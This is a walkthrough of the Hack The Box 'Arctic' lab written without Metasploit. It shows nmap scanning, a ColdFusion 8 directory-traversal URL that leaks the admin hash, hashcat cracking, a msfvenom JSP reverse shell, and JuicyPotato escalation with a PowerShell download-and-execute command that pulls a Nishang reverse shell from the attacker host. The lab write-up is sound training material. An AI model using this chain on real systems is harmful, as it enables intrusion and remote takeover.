Arctic – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Arctic box from Hack The Box, done without using Metasploit.

1. Reconnaissance

I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:

./nmapAutomator.sh 10.10.10.11 All

  • All = runs all the scans consecutively
  • Note: This scan took about 14 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.

Here are the results that come back:

root@kali:/home/churr0s/Scripts/nmapAutomator# ./nmapAutomator.sh 10.10.10.11 All

Running all scans on 10.10.10.11

Host is likely running Windows



---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:27 PDT
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds



---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:27 PDT
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.33 seconds



----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:29 PDT
Nmap scan report for 10.10.10.11
Host is up.
All 1000 scanned ports on 10.10.10.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 201.84 seconds



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:32 PDT
Initiating Parallel DNS resolution of 1 host. at 19:32
Completed Parallel DNS resolution of 1 host. at 19:32, 0.06s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 10.10.10.11 [65535 ports]
Discovered open port 135/tcp on 10.10.10.11
Discovered open port 8500/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 10.46% done; ETC: 19:37 (0:04:25 remaining)
SYN Stealth Scan Timing: About 22.98% done; ETC: 19:37 (0:03:24 remaining)
SYN Stealth Scan Timing: About 34.41% done; ETC: 19:37 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.58% done; ETC: 19:37 (0:02:24 remaining)
Discovered open port 49154/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 57.27% done; ETC: 19:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.69% done; ETC: 19:37 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.12% done; ETC: 19:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 19:37, 263.23s elapsed (65535 total ports)
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 263.38 seconds
           Raw packets sent: 131257 (5.775MB) | Rcvd: 193 (8.492KB)


No new ports




---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:37 PDT
Nmap scan report for 10.10.10.11
Host is up (0.089s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.27 seconds


Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:39 PDT
Nmap scan report for 10.10.10.11
Host is up (0.090s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8500/tcp  open  fmtp?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc   Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.99 seconds



---------------------Recon Recommendations----------------------




---------------------Finished all Nmap scans---------------------


Completed in 14 minute(s) and 45 second(s)

Our findings:

  • Ports 135 and 49154: running Microsoft Windows RPC
  • Port 8500: might be running Flight Message Transfer Protocol (FMTP)
  • All ports from UDP scan are filtered
  • Didn’t get any additional helpful info about vulns, directories or http requests

2. Enumeration

Let’s try to pull up port 8500 in a web browser. We can see that we get a directory listing that shows links for /cfdocs and /cfide so this looks like this is running some kind of web server.

If we click on /cfide we are taken to another directory listing. The response time is super slow and seems to take about 30 seconds for each request/each time you click on something.

We can see a link called administrator and anything called “administrator” is worth checking out. When clicked, it takes us to an Adobe ColdFusion 8 login page, with username “admin” already in there.

Some googling reveals that Adobe ColdFusion 8 has a vulnerability (APSB10-18) that allows us to extract the password hash from the internal password.properties file. The URL to use would look something like this:

http://[HOSTNAME:PORT]</span>/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%en

Here is my final edit. The slashes didn’t work unless reversed:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

 

3. Initial foothold

I pasted the into my browser and the administrator page came up again, but this time, it revealed a password hash:

Now we can take that password hash and use “hashid” (a tool that comes with Kali) to analyze what type of hash it might be:

It looks like it is probably a SHA-1 hash, and that can be cracked by hashcat:

hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt --force

  • hash.txt is the file that contains my hash. I grabbed the hash from the browser and saved it in this text file, which hashcat will then read and try to crack. In other words, it’s the input file of hashes
  • rockyou.txt is a wordlist that comes with kali. Hashcat will run through that list for this attack
  • -m 100 designates the type of hash we are cracking (mode 100. 100 is for SHA-1)

The result is the password “happyday”. I go back to the original URL of the administrator login page and enter the password and it works.

If you navigate to the left menu and click on Debugging & Logging > Scheduled Tasks, you can see that we have the ability to schedule tasks. The tasks look like they pull from a URL we set.

ColdFusion runs *.cfm file types and can also run JSP files. So we should create a JSP payload using msfvenom and point the scheduled task to that file:
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.2 lport=4444 -f raw > shell.jsp

Now that we have the payload generated, we need to host it somewhere so we can point the scheduled task to that URL where it is hosted. Then the scheduled task will save that file to a file path we specify on its side.

Let’s set up an HTTP server on our side first:

And open a listener on our side as well, so when the reverse shell payload is executed, it will connect back to our listener:

nc -lvnp 4444

  • port 4444 is the same port I used when I generated the payload with msfvenom

 

We need to fill out the scheduled task form now. For the URL we know we’re going to use our own URL because we’re hosting the HTTP server. For the “File” section, what should we use? In order to determine this, we need to know the exact folder path where the documents are being served from. Under Server Settings > Mappings, you can see that CFIDE is being served from C:\ColdFusion8\wwwroot\CFIDE. That means we can tell the scheduled task to write shell.jsp to C:\ColdFusion8\wwwroot\CFIDE and then we can trigger the exploit by going to http://10.10.10.11:8500/CFIDE/shell.jsp

Let’s fill out this form now (time doesn’t matter because we are going to run the task manually):

After you hit submit, you should see the scheduled task in the task list. The green icon on the far left will run the task manually. Go ahead and hit that button.

Then in your browser, visit http://10.10.10.11:8500/CFIDE/shell.jsp and if you go back to your listener, you should now see a reverse shell has been spawned:

Running a whoami tells us we are user “tolis” and we can grab their user flag:

However, we are not root so we will need to do some privilege escalation.

 

4. Privilege escalation

Let’s first run systeminfo and whoami /all to enumerate a bit more:

The results show us the victim box is a 64-bit Windows Server 2008R2 system with no hotfixes applied, which is good because it means a lot of privilege escalation exploits for 2008 R2 should work. We can also see that “SeImpersonatePrivilege” is enabled. The exploit “JuicyPotato” will work since the needed privilege is enabled for it.

 

JUICY POTATO STEPS

  1. Download the executable by going to the github page here and then clicking on fresh potatoes on the right to get the latest .exe
  2. Copy that executable to your present working directory (I renamed mine “jp.exe” when I copied it over)
  3. Make sure you also have Nishang. You’ll want to copy the Nishang Invoke-PowershellTcp.ps1 reverse shell script to your present working directory as well (I renamed mine nishang_revshell.ps1 when I copied it over)
    • Edit the revshell.ps1 file and add this syntax to a new line at the end of the file:
      • Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 7600
  4. Copy smbserver.py (comes with Kali) to your present working directory so you can stand up a server with it
  5. Set up an SMB server
    • arctictemp is the “share folder”
    • I’m going to share everything in /home/churr0s/Documents/HTB/arctic/ in my “share folder” for the victim box to grab

6. Create a temp folder on the victim box that you will be able to copy/execute files in

7. Copy the juicy potato executable to the temp directory

    • copy \\10.10.14.2\arctictemp\jp.exe

8. Open up a second listener on our side to receive the new reverse shell we’re going to create with Juicy Potato. I used the same port number I put into the nishang script edit (7600)

    • nc -nlvp 7600

9. On the victim box, run the following command:

    • jp.exe -l 1337 -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -t * -a “-c IEX(new-object net.webclient).downloadstring(‘http://10.10.14.2/nishang_revshell.ps1′)” -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
      • it’s going to invoke powershell, and download the nishang reverse shell, and the last part is the CLSID
      • a CLSID needs to be used to execute Juicy Potato correctly (according to the github repo). You can check them out here and pick the OS of the victim box (in our case 2008 R2) and then select a CLSID. The second one worked for me: {e60687f7-01a1-40aa-86ac-db1cbf673334}

If we go back to our listener, we can see a new reverse shell has been spawned:

Run a whoami and see we are system! Time to grab root flag:

 

Leave a Reply

Your email address will not be published. Required fields are marked *